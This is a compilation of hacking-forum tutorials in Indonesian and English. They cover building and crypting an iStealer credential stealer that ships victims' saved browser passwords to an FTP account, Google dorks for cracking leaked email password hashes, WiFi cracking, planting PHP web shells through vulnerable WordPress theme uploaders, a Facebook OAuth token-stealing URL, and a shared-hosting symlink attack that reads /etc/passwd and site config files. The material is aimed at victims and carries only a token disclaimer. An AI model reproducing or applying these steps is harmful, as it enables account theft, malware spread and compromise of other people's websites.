Hack Email, Facebook dan Myspace Password Menggunakan Istealers

Apa itu stealer?
II IIT adalah software kecil yang mencuri password yang disimpan dalam browser web kami, chatting aplikasi: seperti yahoo messenger Etc, Stealer yang kemudian ditransmisikan sintesis dicuri password ke server FTP hacker, Biasanya pencuri itu terlihat seperti keyloggers tetapi ada banyak perbedaan, Stealer itu. hanya melakukan mencuri password yang disimpan dalam browser web mereka tidak akan menangkap keystrokes diketik oleh pengguna
Keuntungan dari pencuri itu
Yang sangat mudah digunakan, Yang sangat kecil dalam ukuran dan Malthus Sangat mudah untuk memotong deteksi antivirus dengan menggunakan beberapa teknik Disebutkan di bawah ini
Kekurangan
Ini mencuri password itu hanya disimpan dalam browser dan aplikasi chatting, hack ini tidak akan bekerja jika korban belum menyimpan password di web browser-nya, ini memiliki beberapa fitur yang sangat seperti keylogger yang memiliki banyak fitur seperti live monitoring, log chatting dll, Yang tidak stabil seperti keyloggers

Hack Email, Facebook dan Myspace Password Menggunakan iStealer

Hal yang Kita Perlu: -

1 IStealer - Untuk Mencuri korban disimpan password, iStealer Anda dapat mendownload dari sini
2 Akun ftp - Buat akun ftp gratis dari www.drivehq.com
3 Crypter - Untuk memotong deteksi antivirus Anda dapat men-download Crypter FUD gratis dari sini dan password @ hackholic

Catatan: - Jika Anda mendapatkan error mengatakan Comdlg32.ocx hilang, Kemudian Silahkan download hilang OCX dari sini
Prosedur: -

1 iStealer Pertama Download software dari link di atas givenName, ekstrak file menggunakan winrar
Catatan: - antivirus Anda akan mulai berteriak-teriak mengatakan virus yang satu, tetapi yang bukan virus, jadi silakan matikan Anda AV (anti-virus) software sebelum mengekstrak file

2 Setelah mengekstrak file membuka Istealer.exe,   Masukkan host sebagai "ftp.drivehq.com" tanpa tanda kutip, Lalu masukkan rincian account FTP Anda (nama login dan password) yang sebelumnya Anda buat, periksa semua pilihan di sisi kanan seperti yang ditunjukkan

4 Sekarang periksa "mengikat dengan file lain" dan pilih file yang Anda ingin mengikat dengan iStealer ini, Kemudian tekan tombol "mengubah icon" dan mengubah ikon yang Anda inginkan, jadi saya harus menyertakan paket ikon sehingga Anda dapat menggunakan Mereka ikon. Akhirnya pilih membangun dan menyimpan file out put


Sekarang kita telah berhasil membuat file server kami tetapi terdeteksi oleh Av sebagai virus, jadi kita harus crypt file server kami, sehingga untuk memotong deteksi antivirus, Untuk melakukan itu ikuti langkah-langkah di bawah ini givenName

1 Download free software Crypter FUD dari link di atas givenName,


2 Buka iStealer perangkat lunak Pilih file server crypter sebagai file yang Anda buat (file yang dibuat pada langkah 4), dan akhirnya klik crypt
Sekarang iStealer Anda benar-benar tidak terdeteksi,
Sekarang hanya mengirim file ini ke korban, Ketika korban membuka itu ia hanya ingin melihat file atau Web yang Anda diikat pada langkah 4,
Sementara iStealer Anda akan menginstal diam-diam di latar belakang, afterwhich akan mengirim log (Mengandung password yang disimpan membentuk browser korban) ke account FTP Anda, Anda dapat melihat korban password Anda dengan login ke account ftp Anda, Dengan cara ini kita layak untuk berhasil hack korban kami Email, Facebook, Myspace Password

semoga bermanfaat

Hack Email, Facebook and Myspace Passwords Using Istealers

Hack Email, Facebook and Myspace Passwords Using Istealers

What are Stealer's ?

II Iit is a small software which steals passwords that are stored in our web browsers, chat apps such as yahoo messenger .etc , Stealer's then send these stolen passwords to the Hackers FTP server, Usually Stealer's  look like keyloggers but there are many differences, Stealer's steal only  passwords that stored in the web browsers they wont capture keystrokes typed by the user

Advantages of  Stealer's 

Its very easy to use, Its very small in size and thus Very easy to bypass antivirus detection by using some of the techniques mentioned below

Disadvantages 

It steals passwords that are only stored in the browsers and chat apps ,  This hack wont work if victim has not saved his passwords in his web browser , It has very few features Unlike a keylogger which has many features like live monitoring,  chat logs etc , Its not that stable as keyloggers

Hack Email, Facebook and Myspace Passwords Using Istealer

Things We Need :- 

1. Istealer - To Steal victims stored passwords ,You can download Istealer from here

2. Ftp Account - Create a free ftp account from www.drivehq.com

3. Crypter - To Bypass Antivirus detection You can download free FUD Crypter from here and the password is @hackholic

Note:- If you get an error saying COMDLG32.OCX  missing , Then Please download the missing OCX  from  Here

Procedure :-

1. First Download the Istealer Software from the link given above, extract the files using  winrar 

Note :- Your anti virus will start screaming saying its a virus , But its not a virus ,So please turn off your AV(antivirus) software's before extracting the files   

2.  After extracting the files open Istealer.exe ,  Enter Host as "ftp.drivehq.com" without quotes ,Then enter your FTP accounts details (login name and password ) which you created earlier, check all options on the right hand side as shown

4. Now check "bind with another file " and select the file which you want to bind with the Istealer ,Then hit "change the icon " and change the icon as you wish, i have also include an  icon pack you can also use those icons. Finally select build and save the out put file 

Now we have successfully created our server file but it is detected by Av's as virus, so we have to Crypt our server file, so as to bypass antivirus detection , To do that follow the steps given below 

1. Download the Free FUD- Crypter software from the link given above , 

2. Open the crypter Software , Select server file as the Istealer file you created ( file created in step 4) ,finally click crypt

Now your istealer is totally  undetectable,

Now simply send this file to your victim, when the victim opens it  he will only see the file or app which you binded in step 4,

 Mean while your istealer will install silently in the background, After which  it will send  logs (containing stored passwords form the victims browser)  to your ftp account, You can view your victims passwords by logging  into your ftp account ,By this way we are able to successfully  hack our victims Email, Facebook ,Myspace Passwords 

 

SORRY LINKS ARE DOWN 

Hacking any Gmail,Yahoo,Hotmail emails using Google

To get success remeber this rule of hash technique TRY,Try and try :D

HELLO GUYS 
            today i will show u how to hack any gmail yahoo etc accounts very easily.
          I have seen the those people who want to hack someones email accounts spend their lots of time on searching but found nothing.Most of noob hackers try to hack someone with phishing attack.But today i am going to show you a very new method which is called hash technique.
So lets just begin 

1. open www.google.com
2. now paste this code in the search bar and hit enter

  ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e 

3. Now click on any of the displayed pages

   4, After clicking you will se these hashes along with the emails

5. copy any hash code Eg( 127359f404a2b735de9ba1336c66f480) and go to http://www.md5decrypter.co.uk/ paste the hash code and click descrypt hash  After 2-3 seconds it will
give u the password if found.
Some emails wont work they hve changed their passwords or the hash code result is null
I hope that u will enjoy this tutorial thanks and like us on facebook

 


If the above site dont work try these sites md5encryption.com
md5rainbow.com
md5online.org

Note 
       This is illegal and only for educational purpose

Fern wifi Cracker- A Wireless Penetration Testing Tool

 WiFi is now become the way for short distance Internet, for long distance we have WiMAX standard but WiFi is very important because you can find WiFi hot-spot everywhere like at the airport, coffee shop and at the educational places. There are so many people out there who are using WiFi at there home and at offices. Cracking a WiFi connection is a essential part of wardriving but for penetration tester and a ethical hacker WiFi or wireless network security is an important part. 

If you are doing a job as a IT security engineer and your task is to do a pen test on the wifi network. What tools are you going to use?

Operating system for this case is usually Linux or specially Ubuntu or backtrack, backtrack 5 contain different tools for WiFi cracking like aircrack-ng but in this article I will discuss something about Fern WiFi Cracker.

What Is Fern WiFi Cracker ?

Fern wifi cracker is a wireless security auditing application that is written in python and uses python-qt4. This application uses the aircrack-ng suite of tools. It can be run on any linux distribution like Fern wifi cracker is use in ubuntu or even you can use fern wifi cracker in windows but you must have some dependencies to run fern wifi cracker on windows.

Requirements of Fern wifi Cracker:

• python
• python-qt4
• macchanger
• aircrack-ng
• xterm
• subversion

Download Fern Wifi Cracker

 Fern wifi cracker can easily be install on ubuntu and backtrack, backbox,gnackbox and other distribution.

Fern wifi Cracker Tutorial

After downloading the file locate the directory and type. 

root@host:~# dpkg -i Fern-Wifi-Cracker_1.2_all.deb

Click the refresh button to display monitor interfaces:

Please Note, the scan button is a dual button, meaning, by clicking it the first time it scans for networks,then by clicking the button again, it stops any scan that was initialized (vise versa).

Fern wifi is a GUI and it can crack WEP and WPA as well.

please leave comments and like my facebook page if u like this tutorial it took lots of time to write this article

WordPress Themes Vulnerable to this Exploit:

This is an Old Exploit

WordPress Themes Vulnerable to this Exploit:

Quote:WPStore
eShop
KidzStore
Emporium
Store
eCommerce
framework

Tutorial
1. Go to google and search this dork:

Quote:"StoreBox by Templatic" intext:rings
"StoreBox by Templatic" intext:dress
"StoreBox by Templatic" intext:shoes
"StoreBox by Templatic" intext:jacket
"StoreBox by Templatic" intext:jeans
"StoreBox by Templatic" intext:clothes
"StoreBox by Templatic" intext:purse

2. Click on any Website

Example:
http://shopshack.net

Right Click and click view page source:



3. Locate theme within source code.

Which is:

Quote:http://shopshack.net/wp-content/themes/framework/

Notice that the theme is /framework/

We now have found a vulnerable theme to test exploit.



4. Next, add /upload/ to the end of the URL after /framework/



5. Use the Uploader to upload your shell. (Supports: .php .txt .html)


Shell Acces:

Quote:/wp-content/uploads/products_img/SHELL-NAME-HERE.php

Example:

Quote:http://shopshack.net/wp-content/uploads/...mg/dir.php

Another Google DorK:

Quote:inurl:/wp-content/themes/wpstore
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework
inurl:/wp-content/themes/framework/chkorder.php?color=
inurl:/wp-content/themes/wpstore/thumb.php?src=
inurl:/wp-content/themes/framework/thumb.php?src=
inurl:/wp-content/themes/eCommerce/thumb.php?src=
inurl:/wp-content/themes/framework/getsubcat.php?q=

Credits: HackForums

Another way to hack Facebook accounts using OAuth vulnerability

Another way to hack Facebook accounts using OAuth vulnerability

 1472

 4  0 Digg0 Related Posts Plugin for WordPress, Blogger...





In recent few months White hat hacker Nir Goldshlager reported many critical bugs in Facebook OAuth mechanism, that allowed an attacker to hijack any Facebook account without user's interaction.

Another Pentester with the name 'Amine Cherrai' reported a new Facebook OAuth flaw, whose exploitation is actually very similar to Nir Goldshlager's findings; however, this is a new way which is still vulnerable.

Now, if you are knew about the old vulnerability used on Facebook with OAuth in redirect_url parameter in the URL, there is a new way that Amine Cherrai discovered, to bypass the patch made by Facebook security security team.

He found a new file on Facebook, that allows redirection to steal  the access_token of  the victim's account.
Example: http://facebook.com/connect/xd_arbiter.php?#&origin=http://facebook.com/”
Successful exploitation again allowed hacker to hijack Facebook accounts using OAuth Flaw.

Proof:
http://facebook.com/dialog/oauth?client_id=350685531728&response_type=token&display=page&redirect_uri=http%3A%2F%2Ftouch.facebook.com%2Fconnect%2Fxd_arbiter.php%3F%23%21%2Fapps%2Fmidnighthack%2F%3F%26origin%3Dhttp%3A%2F%2Ffacebook.com%2F

Target Website Hacking Technique With ‘symlink_urduhack.php’

Lets start….No DDoS.
Apply My Own Concept Which was introduced by me in 2011,with  UrduHack Team..
If your target website is not vulnerable, but you really want to hack it,
How to get the IP of your target?
Open up cmd (Run->cmd.exe or in Vista/7 press ‘Start button’ and in the search bar enter cmd,
then click it) and type ‘ping targethost.com’. Targethost.com is your target of course.
You will see something like this: Pinging it-sec.biz [204.236.239.5] with 32 bytes of data:.
In the brackets ([]) you can see the remote IP. Now enter it on the given website (above).
You will get every website that is hosted on the server (same hosting).
It makes you the job much easier, because the chances of hacking your target website are much bigger.
You need to exploit only one of them to get to your target. If you managed to upload a shell to one of these websites,
you can be 80% sure that you got your target, of course if it uses a SQL Database (Uses every Forum, Blog and other CMS’s.)
After you uploaded a shell,
upload this great php script coded by the UrduHack Team called ‘symlink_urduhack.php’
Download here.
http://www.4shared.com/file/45COXbtl/symlink_urduhack.html
or
http://winnerprinciple.com/
It creates a symlink to your target website.
So you need to know what CMS your target is running and you need to know where the config file is located.
For example in MyBB it is located in ‘inc/config.php’, in vBulletin it is located in ‘includes/config.php’.
In the uploaded shell (not on your target host, on the website you did it) run a command: cat /etc/passwd
This Unix command will display you the contents of the passwd file located in the etc folder.
That means, every user on the system. If your target’s website is ‘forumpowered.com’ (example)
you need to search in the /etc/passwd file something with ‘forum’ or ‘forumpow’.
If you find something like this, you can be sure it is your target. Use CTRL+F for fast search.
Once you found it, go to the shell home (to the directory where the shell was uploaded) and look for the path in the top.
It will be something like this: /home/[namehere]/public_html/.
Copy it to notepad, and replace your username with your targets one, ‘forumpow’ (example).
Open the uploaded file ‘symlink_urduhack.php’ in your browser and
paste there the path from notepad. It will create a symlink to the target website.
Click the symlink0 hyperlink. If everything worked fine, you will be able to see all files on the target site. (Even read).
But it does not work always, so let’s create a direct symlink to the configuration file, so you can connect to the database
and read the contents.
Let’s imagine, the target forum is running vBulletin and you need to get the content of the config files.
You would enter this: /home/forumpow/public_html/includes/config.php.
Would create a direct symlink to this file. Now you can use your SQL Manager on your shell to connect to the database.
Now,
maybe the most hard part is decrypting the passwords…
You can follow this tut or you can simply update the password and salt with already cracked ones and login with it.
Enjoy…